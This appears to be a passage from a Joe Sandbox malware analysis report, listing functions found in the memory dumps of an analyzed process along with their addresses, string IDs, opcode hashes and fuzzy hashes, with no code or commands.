                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: c$
                                                                                                                                                                                                                                                                    • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                    • Opcode ID: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                                                    • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
                                                                                                                                                                                                                                                                    Function 00415F66 Relevance: 1.9, Strings: 1, Instructions: 605COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: A67H
                                                                                                                                                                                                                                                                    • API String ID: 0-3389657328
                                                                                                                                                                                                                                                                    • Opcode ID: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                                                    • Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58
                                                                                                                                                                                                                                                                    Function 024A8F35 Relevance: 1.8, Strings: 1, Instructions: 598COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: [
                                                                                                                                                                                                                                                                    • API String ID: 0-3878419350
                                                                                                                                                                                                                                                                    • Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                                    • Instruction ID: 3ba1abbb005ae7d47fef9b25955e9e631f09e9f174ff1680e564550c5f84974b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD020075600702CBCB24CF29C8E1663B7F2FFA9714B19859DC4864FBA5EB39A452CB50
                                                                                                                                                                                                                                                                    Function 024C6E67 Relevance: 1.7, Strings: 1, Instructions: 453COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: ,)*k
                                                                                                                                                                                                                                                                    • API String ID: 0-1228391949
                                                                                                                                                                                                                                                                    • Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                                                    • Instruction ID: 9832939cc0ca6e4005c5657630c66589d1309634df904c298b50862bafd67e39
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04C1687DA083105BD364DF29C880A3FFBEAABC6714F29992EE58157780D7319C40CB82
                                                                                                                                                                                                                                                                    Function 00436C00 Relevance: 1.7, Strings: 1, Instructions: 453COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                                    • String ID: ,)*k
                                                                                                                                                                                                                                                                    • API String ID: 2994545307-1228391949
                                                                                                                                                                                                                                                                    • Opcode ID: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
                                                                                                                                                                                                                                                                    • Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
                                                                                                                                                                                                                                                                    Function 00427DA2 Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: m
                                                                                                                                                                                                                                                                    • API String ID: 0-3775001192
                                                                                                                                                                                                                                                                    • Opcode ID: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                                                    • Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
                                                                                                                                                                                                                                                                    Function 024B5BF7 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: 167H
                                                                                                                                                                                                                                                                    • API String ID: 0-2704650348
                                                                                                                                                                                                                                                                    • Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                                    • Instruction ID: 68ed794287213f62c57d89f4b2042641088a8b9800cd6093fe2dc976d33dd27b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FD18772A043444BDB15CF298C816EBF792EFC5314F59862EE985873C0D775C906CBA2
                                                                                                                                                                                                                                                                    Function 024AC921 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: .
                                                                                                                                                                                                                                                                    • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                    • Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                                    • Instruction ID: 81f36312a2ed6ba89055a7637830084efded24017588a7aed2dcd3164ab5f086
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72C105B5D01212CBCB24CF29C8917BBB7B1FF95314F19825ED896AB790E734A941CB90
                                                                                                                                                                                                                                                                    Function 00425990 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                                                    • String ID: 167H
                                                                                                                                                                                                                                                                    • API String ID: 2994545307-2704650348
                                                                                                                                                                                                                                                                    • Opcode ID: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                                                    • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                                                                                                                                                                                                                                    Function 0041C6BB Relevance: 1.7, Strings: 1, Instructions: 444COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: .
                                                                                                                                                                                                                                                                    • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                    • Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                                    • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                                                                                                                                                                                                                                    Function 024B1F77 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &#
                                                                                                                                                                                                                                                                    • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                    • Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                                    • Instruction ID: 96b86d7540c5f77ace728f7c69143a4dcb02229961cbb447936c71c566bc1532
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81A14C71A042105BDB1ADF28CC526BB73E5EF91324F09852EED96DB390E3B4D905C762
                                                                                                                                                                                                                                                                    Function 00421D10 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: &#
                                                                                                                                                                                                                                                                    • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                    • Opcode ID: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                                    • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                                                                                                                                                                    Function 0041CB05 Relevance: 1.7, Strings: 1, Instructions: 407COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: .
                                                                                                                                                                                                                                                                    • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                    • Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                                    • Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
                                                                                                                                                                                                                                                                    Function 024AC528 Relevance: 1.6, Strings: 1, Instructions: 342COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: de
                                                                                                                                                                                                                                                                    • API String ID: 0-2106599819
                                                                                                                                                                                                                                                                    • Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                                    • Instruction ID: 237539fc1c8f80e61523eba48e1ed7785010906efede98e614aae4835ec7f1bb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53912271908311CAC324DF68C8E266BB7F2EFA1324F18992EE4D64B391E7788505C792
                                                                                                                                                                                                                                                                    Function 024AD4D7 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: ~
                                                                                                                                                                                                                                                                    • API String ID: 0-1707062198
                                                                                                                                                                                                                                                                    • Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                                                    • Instruction ID: 5bc335a9b2116e7bd9f3a38b2fdb064bd79dfa175364076baab1d7d3bead90e0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FA12976E042619FC725CE2CCC906ABB7E1AF95324F19823EECA9973D1D7318806C791
                                                                                                                                                                                                                                                                    Function 0041D270 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: ~
                                                                                                                                                                                                                                                                    • API String ID: 0-1707062198
                                                                                                                                                                                                                                                                    • Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                                    • Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1
                                                                                                                                                                                                                                                                    Function 00426E50 Relevance: 1.6, Strings: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: RpB
                                                                                                                                                                                                                                                                    • API String ID: 0-664042118
                                                                                                                                                                                                                                                                    • Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                                    • Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A
                                                                                                                                                                                                                                                                    Function 004252BA Relevance: 1.6, Strings: 1, Instructions: 303COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: d1
                                                                                                                                                                                                                                                                    • API String ID: 0-4211392460
                                                                                                                                                                                                                                                                    • Opcode ID: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                                                    • Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A
                                                                                                                                                                                                                                                                    Function 024A77E9 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: c$
                                                                                                                                                                                                                                                                    • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                    • Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                    • Instruction ID: 34d734b052877dbdf523287f9c605fbc5785e0f76673639941e077e5292fae27
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E49199B0101741CFE7648F25C8A0B63BBB2FF56318F19958DC4864FBA1E379A846CB94
                                                                                                                                                                                                                                                                    Function 024CD557 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: ihgf
                                                                                                                                                                                                                                                                    • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                    • Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                                    • Instruction ID: 6b8f5fe0cc72ad51f6b5591bbed2a957451959d292013d7bf185c2e6d6f1656a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3881B178A05201DFD754DF2CC880A6BB7E2EF99714F29953DE5858B3A1DB31E841CB42
                                                                                                                                                                                                                                                                    Function 0043D2F0 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InitializeThunk
